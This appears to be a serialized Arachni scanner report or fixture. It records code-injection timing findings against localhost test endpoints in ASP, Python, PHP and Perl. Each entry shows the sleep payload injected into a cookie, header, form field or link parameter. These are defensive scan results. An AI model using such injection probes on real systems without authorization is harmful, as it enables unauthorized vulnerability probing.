Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:14309/asp/cookie/straight elem: cookie method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' Thread.Sleep(__TIME__);' :skip_orig: true :injected_orig: ! ' Thread.Sleep(16000);' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' Thread.Sleep(16000);' :injected: ! ' Thread.Sleep(16000);' :combo: !binary "Y29va2ll": ! ' Thread.Sleep(16000);' :action: http://localhost:14309/asp/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:14309/asp/cookie/straight injected: ! 
' Thread.Sleep(16000);' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=++Thread.Sleep(16000)%3B response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:14309/asp/header/straight elem: header method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' && Thread.Sleep(__TIME__);' :skip_orig: true :injected_orig: ! ' && Thread.Sleep(16000);' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! ' && Thread.Sleep(16000);' :injected: ! ' && Thread.Sleep(16000);' :combo: User-Agent: ! ' && Thread.Sleep(16000);' :action: http://localhost:14309/asp/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:14309/asp/header/straight injected: ! ' && Thread.Sleep(16000);' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! 
' && Thread.Sleep(16000);' Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/python/form/straight elem: form method: POST name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' import time;time.sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' import time;time.sleep(16000/1000);' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' import time;time.sleep(16000/1000);' :follow_location: true :injected: ! ' import time;time.sleep(16000/1000);' :combo: !binary "aW5wdXQ=": ! ' import time;time.sleep(16000/1000);' :action: http://localhost:14309/python/form/straight :silent: true :regexp: '' var: input url: http://localhost:14309/python/form/straight injected: ! 
' import time;time.sleep(16000/1000);' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/python/link/straight?input=default elem: link method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' import time;time.sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' import time;time.sleep(16000/1000);' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' import time;time.sleep(16000/1000);' :follow_location: true :injected: ! ' import time;time.sleep(16000/1000);' :combo: !binary "aW5wdXQ=": ! ' import time;time.sleep(16000/1000);' :action: http://localhost:14309/python/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:14309/python/link/straight?input=default injected: ! 
' import time;time.sleep(16000/1000);' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:14309/python/cookie/straight elem: cookie method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' import time;time.sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' import time;time.sleep(16000/1000);' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' import time;time.sleep(16000/1000);' :injected: ! ' import time;time.sleep(16000/1000);' :combo: !binary "Y29va2ll": ! ' import time;time.sleep(16000/1000);' :action: http://localhost:14309/python/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:14309/python/cookie/straight injected: ! 
' import time;time.sleep(16000/1000);' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=++import+time%3Btime.sleep(16000/1000)%3B response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:14309/python/header/straight elem: header method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' && import time;time.sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' && import time;time.sleep(16000/1000);' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! ' && import time;time.sleep(16000/1000);' :injected: ! ' && import time;time.sleep(16000/1000);' :combo: User-Agent: ! ' && import time;time.sleep(16000/1000);' :action: http://localhost:14309/python/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:14309/python/header/straight injected: ! 
' && import time;time.sleep(16000/1000);' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! ' && import time;time.sleep(16000/1000);' Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/php/form/straight elem: form method: POST name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' sleep(16000/1000);' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :follow_location: true :injected: ! ' sleep(16000/1000);' :combo: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :action: http://localhost:14309/php/form/straight :silent: true :regexp: '' var: input url: http://localhost:14309/php/form/straight injected: ! 
' sleep(16000/1000);' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/php/link/straight?input=default elem: link method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' sleep(16000/1000);' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :follow_location: true :injected: ! ' sleep(16000/1000);' :combo: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :action: http://localhost:14309/php/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:14309/php/link/straight?input=default injected: ! 
' sleep(16000/1000);' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:14309/php/cookie/straight elem: cookie method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' sleep(16000/1000);' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' sleep(16000/1000);' :injected: ! ' sleep(16000/1000);' :combo: !binary "Y29va2ll": ! ' sleep(16000/1000);' :action: http://localhost:14309/php/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:14309/php/cookie/straight injected: ! 
' sleep(16000/1000);' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=++sleep(16000/1000)%3B response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:14309/php/header/straight elem: header method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' && sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' && sleep(16000/1000);' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! ' && sleep(16000/1000);' :injected: ! ' && sleep(16000/1000);' :combo: User-Agent: ! ' && sleep(16000/1000);' :action: http://localhost:14309/php/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:14309/php/header/straight injected: ! ' && sleep(16000/1000);' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! 
' && sleep(16000/1000);' Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/perl/form/straight elem: form method: POST name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' sleep(16000/1000);' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :follow_location: true :injected: ! ' sleep(16000/1000);' :combo: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :action: http://localhost:14309/perl/form/straight :silent: true :regexp: '' var: input url: http://localhost:14309/perl/form/straight injected: ! 
